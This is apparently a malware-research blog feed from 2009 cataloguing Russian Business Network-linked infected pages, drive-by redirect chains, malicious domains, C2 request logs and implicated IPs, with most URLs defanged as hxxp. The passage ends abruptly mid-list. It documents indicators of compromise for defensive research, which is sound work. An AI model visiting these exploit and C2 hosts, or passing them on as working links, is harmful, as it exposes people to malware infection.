/banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/subids/v3072 <br />Response: 404 "Not Found" <br />Request: GET /banner/crcmds/builds/bbr <br />Response: 200 "OK" <br />Request: GET /banner/crfiles/uacbbr <br />Response: 200 "OK" <br /><br />72.233.114.126:80 - [statsanalist.cn] <br /><br />Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 <br />Response: 200 "OK" <br />Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 <br />Response: 200 "OK" <br /><br /><hr /> IPs implicated:<br /><br />209.44.126.14<br />209.44.126.15<br />209.44.126.16<br />209.44.126.17<br />209.44.126.22<br />209.44.126.23<br />209.44.126.29<br />209.44.126.32 <br /><br />Other domain in conjunction can be found using ThreatExpert<br /><br /><a href="http://www.threatexpert.com/reports.aspx?find=banner%2Fcrcmds%2Fmain" target="_blank">/banner/crcmds/main</a><br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=aa0358f54817c3f8c143ade90f228c5b" target="_blank">Report 1</a><br /><a href="http://www.threatexpert.com/report.aspx?md5=1d3b847cc5a235142acd32d1deba6aff" target="_blank">Report 2</a><br /><br /><p>92.48.91.144<br />trafficstatic.com<br />explorerex.com<br />windowslogonex.com</p><p>92.48.91.145<br />trafficstatic.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=100b5b3f6cfef4c9290a3a7cbd5a58a4" target="_blank">ThreatExpert Report</a></p><p>95.211.14.159<br />golddiggero1.com</p><p>76.76.103.162<br />webieupdate.net</p><p>94.76.208.32<br />symupdate2.com<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a></p><p>72.233.114.125<br />webnicrisoft.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a></p><p>64.213.140.254<br />webmsupdate.net<br /><a href="http://www.threatexpert.com/report.aspx?md5=51bb024c51975821b307cdeecb070b0b" target="_blank">ThreatExpert Report</a><br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-32446320936023593342009-04-20T02:05:00.000-07:002009-04-20T16:07:51.240-07:00Black Hat SEO - RBN Hacks, p.4<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="502" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br /> Crimeware toolkits in the wild<br /></p><table width="488" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="488"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) <br /> which lead to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><p>Another very good example on the site below which lead to other domain in the network previously cited "Eurohost LLC " shows that this attack seems to be everywhere.<br /><br />IFrames injected, pdf malware + viruses. Attached some screenshots.<br /><br /><hr />Infected page:<br /><br /><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://team-sleep.by.ru/default2.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=604bd9c2390b9bad17a7d36a01a31421&t=1240189015&type=js" target="_blank">Analysis</a><br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://8addition.info/t/?75724cae9d <br />hxxp://sexbases.cn/in.cgi?16&161b72<br />hxxp://utevox.site90.com/f/index.php</td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwAwjXtE_G3ij_j9s0egWm9xJdRYYUgKMLVxb-DDfH1L-mjc4CEJvkk6wMRIHhiM3Cnc8D9Xwmmt3jT13djRQAMuiPTP9yyt0gswErkNTNSJAEBOhkqhBjA7kT3fXRSO-OKwFpIUnkmTP/s1600-h/default2.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 167px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwAwjXtE_G3ij_j9s0egWm9xJdRYYUgKMLVxb-DDfH1L-mjc4CEJvkk6wMRIHhiM3Cnc8D9Xwmmt3jT13djRQAMuiPTP9yyt0gswErkNTNSJAEBOhkqhBjA7kT3fXRSO-OKwFpIUnkmTP/s320/default2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697404935945826" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://team-sleep.by.ru/demo.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=15d95656782ca0e0a1318bba5b3d5db0&t=1240189151&type=js" target="_blank">Analysis</a><br /></p><p> Requests: <br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://bizoplata.ru/post.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects: <br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDbmHLiGgvuNS9iDf3apxlAkRDY_c4dcDe8SnfO4sVfmTrGAQzGfkcxC4xB-3PnQxsYzbxtIJ7hkSFJqvAqTnE-_EnnQocCwfVBpsX_SHpTjeBRks9OJcWF5x9ShPgok2PRPzfNFZexm6E/s1600-h/demo.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDbmHLiGgvuNS9iDf3apxlAkRDY_c4dcDe8SnfO4sVfmTrGAQzGfkcxC4xB-3PnQxsYzbxtIJ7hkSFJqvAqTnE-_EnnQocCwfVBpsX_SHpTjeBRks9OJcWF5x9ShPgok2PRPzfNFZexm6E/s320/demo.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697406846514322" /></a></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/gold.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=c0ca85dbda05d075a7c97ab22a8630db&t=1240189158&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://team-sleep.by.ru/gold.html<br /> hxxp://5rublei.com/unique/index.php<br /> hxxp://tochtonenado.com/yes/index.php <br /> hxxp://mixbunch.cn/thread.html<br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4<br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html<br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects: <br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /><br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhMoU-JCSbPH9YU5hLPsIk7JgNlpj9KEwbSEM2q7WP4Rdaj1_5MBFOBYfTyCD97cXq-2dW00W3CDRlyEVz7LbUpTauqi40RXst6cXUSsuWfJ_O1W3yBW6-4NNO_O-ofgTEl7zDc-1vr1y/s1600-h/gold.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhMoU-JCSbPH9YU5hLPsIk7JgNlpj9KEwbSEM2q7WP4Rdaj1_5MBFOBYfTyCD97cXq-2dW00W3CDRlyEVz7LbUpTauqi40RXst6cXUSsuWfJ_O1W3yBW6-4NNO_O-ofgTEl7zDc-1vr1y/s320/gold.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697411712294674" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/googleanalyticsru.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=e453f768a057c80b81f2e547bbbf8242&t=1240189161&type=js" target="_blank">Analysis</a><br /><br /> Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/googleanalyticsru.html<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://sunmaiamibich.ru/</td></tr></table><p> Redirects: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyNfmYt63Pec77LuNZcBynu89niu2N8DwnKWGRKbQ2aShFw-RlnDXA0ewn6PTp0qRB44uBHGhL1Oax5OLDmQI5SQMbXs-AZTXVBTTPQvndL6f4iBDhU8JbJTX14MN-KUZdC-LjkJztImKX/s1600-h/googleanalyticsru.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 218px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyNfmYt63Pec77LuNZcBynu89niu2N8DwnKWGRKbQ2aShFw-RlnDXA0ewn6PTp0qRB44uBHGhL1Oax5OLDmQI5SQMbXs-AZTXVBTTPQvndL6f4iBDhU8JbJTX14MN-KUZdC-LjkJztImKX/s320/googleanalyticsru.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697410248832818" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/media.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=829cb08a1a36b11a84fc82f50448f8e5&t=1240189172&type=js" target="_blank">Analysis</a><br /><br />Requests:</p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/media.html<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /><br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1l_gUEQbMkFbUSAri4HsLMnXsW65s5wC-mxPSyYCbaXGQqJ0zun6P2faOO93GGS6QtyzbqqVfSXqGFuEWdyzCrtUc2XwtPhvegy0HNUuZESk6Bp9WvR0foataU1wB1HhKQS1APsjiUeM_/s1600-h/media.html.jpg"><img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1l_gUEQbMkFbUSAri4HsLMnXsW65s5wC-mxPSyYCbaXGQqJ0zun6P2faOO93GGS6QtyzbqqVfSXqGFuEWdyzCrtUc2XwtPhvegy0HNUuZESk6Bp9WvR0foataU1wB1HhKQS1APsjiUeM_/s320/media.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697413596172466" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/menu.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1240190210&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/menu.html<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://bizoplata.ru/post.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://mixbunch.cn/bowling.html</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOWbQ56j_kWHJXbvnKiOCYsbudYU03xpIn3MleiPjqNIp0maSqL-43K9LkTnV-b5nxXVDgnPrEBmEx1n5HDJXK59ImbalyRKLuaqR96irutgIMcqb58q5BMeCubpVt3QArAj2-zt8tQURZ/s1600-h/menu.html.jpg"><img style="cursor:pointer; cursor:hand;width: 239px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOWbQ56j_kWHJXbvnKiOCYsbudYU03xpIn3MleiPjqNIp0maSqL-43K9LkTnV-b5nxXVDgnPrEBmEx1n5HDJXK59ImbalyRKLuaqR96irutgIMcqb58q5BMeCubpVt3QArAj2-zt8tQURZ/s320/menu.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773772393394" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/news.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=a370e072f26ab0fc502ef5f090100f2d&t=1240189203&type=js" target="_blank">Analysis</a><br /></p>Requests: <br /><br /><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px"> hxxp://moneypuller.site90.net/images/gallery/index.php<br /> hxxp://error.000webhost.com/not_found.html<br /> hxxp://www.000webhost.com/?id=1<br /> hxxp://www.000webhost.com/<br /> hxxp://mixbunch.cn/thread.html<br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4<br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html<br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p>Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-rkR4r9zXgfo5eVFvuyCyBb85nJznPv2vCWaVomxaM7PJSIt-_mpVCCD28TdYocFsaKEIT_5WvTSxealzcQXFqy2E8wMmRaKYwpR_Uuvh_osqmcZMU_kMr3IAtXdi0dXvzCXEo4U6c_B/s1600-h/news.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-rkR4r9zXgfo5eVFvuyCyBb85nJznPv2vCWaVomxaM7PJSIt-_mpVCCD28TdYocFsaKEIT_5WvTSxealzcQXFqy2E8wMmRaKYwpR_Uuvh_osqmcZMU_kMr3IAtXdi0dXvzCXEo4U6c_B/s320/news.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773721819954" /></a></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo2.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=b0240b35b771b8d402b49bf3e7827572&t=1240189200&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php</td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jORh1ERUDK0bJhJjUZVaG_AOOX8K2FYMf0f4NQLmj4gYcKfoL8sFVtmInruL7RGd5z1-aSG2FPTkEJDazBokZYk1sGbMoMzmUNxaEWqGA9MnxSQ224SAkshgi1_k9l53iK_0yJijxJH5/s1600-h/photo2.html.jpg"><img style="cursor:pointer; cursor:hand;width: 244px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jORh1ERUDK0bJhJjUZVaG_AOOX8K2FYMf0f4NQLmj4gYcKfoL8sFVtmInruL7RGd5z1-aSG2FPTkEJDazBokZYk1sGbMoMzmUNxaEWqGA9MnxSQ224SAkshgi1_k9l53iK_0yJijxJH5/s320/photo2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697777139072290" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px"> hxxp://team-sleep.by.ru/poem.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=195a5226ceb60d0db3a38b2a8da4e763&t=1240189221&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIA5PvpaXIWlVUsB7YtJQ7j45cEc7K0QEv0Jaxsf70WsNuktFGYB9WKGLWcy0gAArucCVH2QixN7ecnlWSRFCIBQWtOuCcA39CcEPZ2rdv1T0fy9InOe65flNkwaGHu_zLdD1nd8caRzg/s1600-h/peom.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 286px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIA5PvpaXIWlVUsB7YtJQ7j45cEc7K0QEv0Jaxsf70WsNuktFGYB9WKGLWcy0gAArucCVH2QixN7ecnlWSRFCIBQWtOuCcA39CcEPZ2rdv1T0fy9InOe65flNkwaGHu_zLdD1nd8caRzg/s320/peom.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697779850021298" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/press_reviews.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=13731fd005d76fdaf4594868bf38fd66&t=1240189277&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p> Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhofSdsC5GSfOAKwRnqX1zQ3VGCbHom7k28iQOq1HtlWAHruAYXWIRBK-qoXfpvg2yJkFw8jtZcLXKpwIKCts0XWMajqZ5f-yfT88f2eiceI2x5DCmeokPnrNV2LCLCZl8Q111F4FPMXKDR/s1600-h/press_review.html.jpg"><img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhofSdsC5GSfOAKwRnqX1zQ3VGCbHom7k28iQOq1HtlWAHruAYXWIRBK-qoXfpvg2yJkFw8jtZcLXKpwIKCts0XWMajqZ5f-yfT88f2eiceI2x5DCmeokPnrNV2LCLCZl8Q111F4FPMXKDR/s320/press_review.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697785555240354" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/team-sleep.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=279207d4fff5b20adcd1fb624b3740ab&t=1240189275&type=js" target="_blank">Anaysis</a><br /><br /> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p>Redirects:<br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs3takqQP9WLwcRFfTLx1vPCH5a5fbXOhdgFsTqRCURt3kuLceemqi_i6m-pV5lowNnN7v3cwnL29EUEHtUjlLgCqxjU_P4Tcjrj-uE6zU4dKxEb5qxmJIqG1oEFVbuVedrM7mgvwyi-wX/s1600-h/team-sleep.html.jpg"><img style="cursor:pointer; cursor:hand;width: 313px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs3takqQP9WLwcRFfTLx1vPCH5a5fbXOhdgFsTqRCURt3kuLceemqi_i6m-pV5lowNnN7v3cwnL29EUEHtUjlLgCqxjU_P4Tcjrj-uE6zU4dKxEb5qxmJIqG1oEFVbuVedrM7mgvwyi-wX/s320/team-sleep.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698010412514386" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/gmail.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=9fc1f920da916d7b64e66c3eec43d1cf&t=1240189268&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://counnter.cn/top100_00.js <br />hxxp://counnter.cn/z/count.php?o=1 <br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p> Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rd-k-E39yiTCsAvp30fKL5mo74NOShKscLxA1oSxd-UMplXN1uvjqqWz2aDXNdjwp01-hBUSVbtL_rJuuE3l17R20YoyAGusc8zzVuJkVXS4P16JpjhaZFNGkrvEmon-fvDPe2z9j7hi/s1600-h/gmail.php.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rd-k-E39yiTCsAvp30fKL5mo74NOShKscLxA1oSxd-UMplXN1uvjqqWz2aDXNdjwp01-hBUSVbtL_rJuuE3l17R20YoyAGusc8zzVuJkVXS4P16JpjhaZFNGkrvEmon-fvDPe2z9j7hi/s320/gmail.php.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698006637059474" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/haitou.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=29b0af53df0979e7246d9e89e09352cc&t=1240189409&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/in.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=6f6f7fb6acc398f4a4e0d55b8d675936&t=1240189407&type=js" target="_blank">Analysis</a><br /><br />Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://www.rogercombs.org/index.php<br />hxxp://5rublei.com/unique/index.php<br 